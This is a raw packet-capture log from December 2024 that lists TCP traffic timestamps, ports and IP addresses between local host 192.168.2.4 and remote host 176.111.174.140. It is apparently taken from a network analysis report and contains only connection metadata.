                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.482928038 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.484138012 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.484359026 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.484411001 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.484950066 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.485029936 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.485080004 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.486083984 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.486200094 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.486249924 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.487234116 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.487405062 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.487457037 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.488293886 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.488449097 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.488500118 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.489455938 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.489588976 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.489641905 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.490472078 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.490509987 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.490561962 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.491625071 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.491724014 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.491776943 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.492710114 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.492827892 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.492875099 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.493879080 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.494024992 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.494069099 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.494935036 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.495138884 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.495189905 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.496021986 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.496185064 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.496234894 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.497134924 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.497186899 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.497239113 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.498253107 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.498356104 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.498403072 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.499341011 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.499407053 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.499463081 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.500458002 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.500533104 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.500576973 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.501591921 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.501643896 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.501698971 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.502988100 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.503102064 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.503149986 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.503859043 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.503984928 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.504035950 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.504874945 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.504885912 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.504936934 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.505945921 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.506086111 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.506138086 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.507106066 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.507251978 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.507306099 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.508205891 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.508310080 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.508361101 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.509274006 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.509357929 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.509408951 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.510390997 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.510492086 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.510544062 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.511502028 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.511775970 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.511822939 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.512593985 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.512650013 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.512701035 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.513695002 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.513742924 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.513808012 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.514834881 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.514940977 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.514993906 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.515911102 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.516017914 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.516069889 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.517030001 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.517131090 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.517179012 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.518147945 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.518253088 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.518309116 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.519395113 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.519494057 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.519541025 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.520370007 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.520381927 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.520433903 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.521446943 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.521568060 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.521617889 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.522530079 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.522710085 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.522960901 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.523641109 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.523727894 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.523972034 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.524723053 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.569135904 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.660243988 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.660289049 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.660367012 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.660861969 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.660943985 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.660995007 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.661868095 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.662003994 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.662053108 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.663007021 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.663161039 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.663214922 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.664098978 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.664248943 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.664370060 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.665219069 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.665316105 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.665359974 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.666460991 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.666474104 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.666518927 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.667546034 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.667628050 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.667674065 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.668497086 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.668617964 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.668675900 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.669603109 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.669728041 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.669773102 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.670701981 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.670773029 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.670814991 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.671925068 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.671972036 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.672014952 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.672946930 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.673058987 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.673105001 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.674037933 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.674110889 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.674155951 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.675158024 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.675240040 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.675288916 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.676281929 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.676449060 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.676501036 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.677351952 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.677484035 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.677544117 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.678446054 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.678594112 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.678702116 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.679573059 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.679697990 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.679745913 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.680660963 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.680783987 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.680828094 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.681796074 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.681845903 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.681893110 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.683027983 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.683237076 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.683280945 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.683996916 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.684079885 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.684127092 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.685086966 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.685167074 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.685211897 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.686206102 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.686310053 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.686361074 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.687381983 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.687477112 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.687591076 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.688393116 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.688522100 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.688566923 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.689621925 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.689718008 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.689764023 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.690732002 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.690888882 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.690929890 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.691890001 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.692001104 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.692044020 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.692990065 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.693084002 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.693150997 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.693957090 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.694051981 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.694384098 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.695075035 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.695336103 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.695426941 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.696147919 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.696255922 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.696372032 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.697339058 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.697690010 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.697751999 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.698401928 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.698484898 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.698529959 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.699487925 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.699588060 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.699763060 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.700660944 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.700787067 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.701013088 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.701653004 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.701724052 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.701889038 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.702059031 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.702806950 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.703047991 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.703114033 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.704052925 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.704497099 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.704571962 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.705044985 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.705136061 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.705183983 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.706127882 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.706250906 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.706305981 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.707191944 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.707289934 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.707494974 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.708297968 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.708370924 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.708448887 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.709394932 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.709443092 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.709490061 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.710489035 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.710649967 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.710714102 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.711623907 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.711779118 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.711824894 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.712701082 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.712833881 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.712877989 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.714679003 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.714776039 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.714828014 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.714916945 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.715059042 CET8049738176.111.174.140192.168.2.4
